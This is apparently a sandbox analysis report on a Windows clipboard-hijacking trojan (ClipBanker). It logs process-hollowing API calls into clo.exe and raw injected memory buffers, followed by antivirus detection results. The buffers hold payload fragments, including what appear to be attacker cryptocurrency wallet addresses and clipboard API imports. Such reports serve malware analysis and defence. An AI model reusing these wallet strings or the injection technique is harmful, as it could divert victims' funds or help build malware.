CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2536 thread_handle: 0x0000000000000068 process_identifier: 2532 current_directory: C:\Users\test22\AppData\Local\Temp\1245 filepath: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2444	1	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2444	1	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 2444	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2592 thread_handle: 0x0000020c process_identifier: 2588 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\1245\clo.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000210	1	1
NtUnmapViewOfSection July 31, 2021, 1:27 p.m.	base_address: 0x00400000 region_size: 774144 process_identifier: 2588 process_handle: 0x00000210		3221225497
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2588 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000210		3221225496
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2716 thread_handle: 0x0000020c process_identifier: 2712 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\1245\clo.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000210	1	1
NtUnmapViewOfSection July 31, 2021, 1:27 p.m.	base_address: 0x00400000 region_size: 708608 process_identifier: 2712 process_handle: 0x00000210		3221225497
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2712 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000210		3221225496
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2752 thread_handle: 0x0000020c process_identifier: 2748 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\1245\clo.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000210	1	1
NtUnmapViewOfSection July 31, 2021, 1:27 p.m.	base_address: 0x00400000 region_size: 1991770112 process_identifier: 2748 process_handle: 0x00000210		3221225497
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2748 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000210	1	0
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: MZÿÿ¸@Àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁÓw¯ÏÓw¯ÏÓw¯Ï®ÎÖw¯ÏÓw®ÏÙw¯ÏJ¦ÎÖw¯ÏJÎÒw¯ÏRichÓw¯ÏPEL¡Æî`àI @P@Ø)(@ìì(8 .textá `.rdatal @@.dataL0@À.relocì@ @B base_address: 0x00400000 process_identifier: 2748 process_handle: 0x00000210	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: base_address: 0x00401000 process_identifier: 2748 process_handle: 0x00000210	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: (:HPG2A/CLP/05/RYS1KCU1upyTnLHbVXCw4CuQvkxFwwMU6eb243DBpxVQ1kdYoJbWwux2Bfz54BfMB5Z2CQ4bc1qq3e09ltqvuzg903dxs7qhhajkel95rzwu4f2y2LaMw5ctk956V3hrtqfco6EzYzWioaGtQRrMPeYRpxQTaWpxt6RuXwqtf3T3FzWFBfbP2ltc1qwjd79y7pk34qunyk8zpz3dllekd7x54pvemhaa0x1c75A4Abe39e8F2984a1c66A898BF7E0b5c3E7E100000L0000T00MON00000000000000000000000LaMw5ctk956V3hrtqfco6EzYzWioaGtQRr00000000000000W000000084gR9n7jyYwQjW3ccMXuB1MpQaNMJ3AsKUzxDTaK9eWr2hch4ZqF18aAfCxVWQiF8G8NSL33xksEL98WFhLgXPLjQNFpwDsD7G1qQZYtFg4tJxtGRpZTMP5id2zd8sfeCaddr1q9xxn652n0wh0pk3h6guecvh6pxrkgp06rlm80tvsxpqkzqh0zxr9yhqkaawf34l8k8w0cdac0k6cljggt9jtftwmz3q8826j9Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPEZ1KCU1upyTnLHbVXCw4CuQvkxFwwMU6eb24t1YyT26xv4ZAHWTxqqHUoWcW9NhZ7SQoYMjbnb1g9wjgxzzgksqmyfsnppeqgr8yj66zwj8ld90mjkernel32.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard @ #@`"@($@&@¸%@°!@h!@à#@8 @È @ @p%@ø$@"@ !@¡Æî` ´$)$¡Æî`GCTLá.text$mn .idata$5 .rdata$)´.rdata$zzzdbgØ).idata$2ì).idata$3.idata$4T.idata$60L.bss^* (:HP*ÄLoadLibraryW®GetProcAddress^ExitProcess}Sleep4GlobalFreeKERNEL32.dll base_address: 0x00402000 process_identifier: 2748 process_handle: 0x00000210	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: base_address: 0x00403000 process_identifier: 2748 process_handle: 0x00000210		0
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: Ä0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~00000¤0«0°0¶0¼0Á0Ç0Í0Ò0Ø0Þ0ã0é0ï0ô0ú0111111%1*10161;1A1G1L1S1X1_1d1k1s1z1111111£1¨1®1´1¹1À1È1Ï1×1Þ1ã1ê1ï1ö1û1222222#2)2.242:2?2E2K2R2Û2í2þ233$3=3P3h333¢3¯3»3È3á3í34%424K4Z4444¸4Ê4Ø4å4ò455'5<5J5W5d5p5}55¢5Õ5â5ï56!6:6S6l666·6Ð6Ü67(747V7c7p777¥7±7Ð7Ý7ê7ù788.8J8W8d8s888º8Å8Ì8Ö8Þ8è8ñ8÷8þ89 9-9:9@9X9b9h9w99¥9 :?:h::::ª:a;n;; ;Õ;<3<±<Ê<Ö<5=B=O=\=q=Ð=Ý=ê=÷=>ª>·>Ä>Ñ> (¬8°8´8¸8¼8À8Ä8È8Ì8Ð8Ô8Ø8Ü8à8ä8è8 base_address: 0x00404000 process_identifier: 2748 process_handle: 0x00000210	1	1
NtGetContextThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000020c	1	0
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2748 process_handle: 0x00000210	1	1
NtSetContextThread July 31, 2021, 1:27 p.m.	registers.eip: 1997996484 registers.esp: 2882360 registers.edi: 0 registers.eax: 4200777 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000020c process_identifier: 2748	1	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000020c suspend_count: 1 process_identifier: 2748	1	0

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

Lionic	Trojan.Win32.ClipBanker.7!c
MicroWorld-eScan	Gen:Variant.Bulz.577413
ALYac	Gen:Variant.Bulz.577413
Cylance	Unsafe
K7GW	Trojan-Downloader ( 0058026e1 )
Cybereason	malicious.4c6466
Arcabit	Trojan.Bulz.D8CF85
Symantec	Trojan.Gen.2
ESET-NOD32	BAT/TrojanDownloader.Agent.OIU
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Trojan-Banker.Win32.ClipBanker.qcm
BitDefender	Gen:Variant.Bulz.577413
Avast	Win64:Trojan-gen
Ad-Aware	Gen:Variant.Bulz.577413
Emsisoft	Gen:Variant.Bulz.577413 (B)
McAfee-GW-Edition	BehavesLike.Win64.Dropper.gc
FireEye	Generic.mg.17b0dca4c5d5c303
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
Kingsoft	Win32.Troj.Banker.(kcloud)
Microsoft	Trojan:Win32/Conteban.A!ml
GData	Gen:Variant.Bulz.577413
Cynet	Malicious (score: 100)
McAfee	Artemis!17B0DCA4C5D5
MAX	malware (ai score=100)
VBA32	Trojan.Win64.MulDrop
Malwarebytes	Trojan.PowerShell
TrendMicro-HouseCall	TROJ_GEN.R002H0DGU21
Ikarus	Win32.Outbreak
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	BAT/Agent.OIU!tr.dldr
Webroot	W32.Trojan.Gen
AVG	Win64:Trojan-gen
CrowdStrike	win/malicious_confidence_60% (W)

clip.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All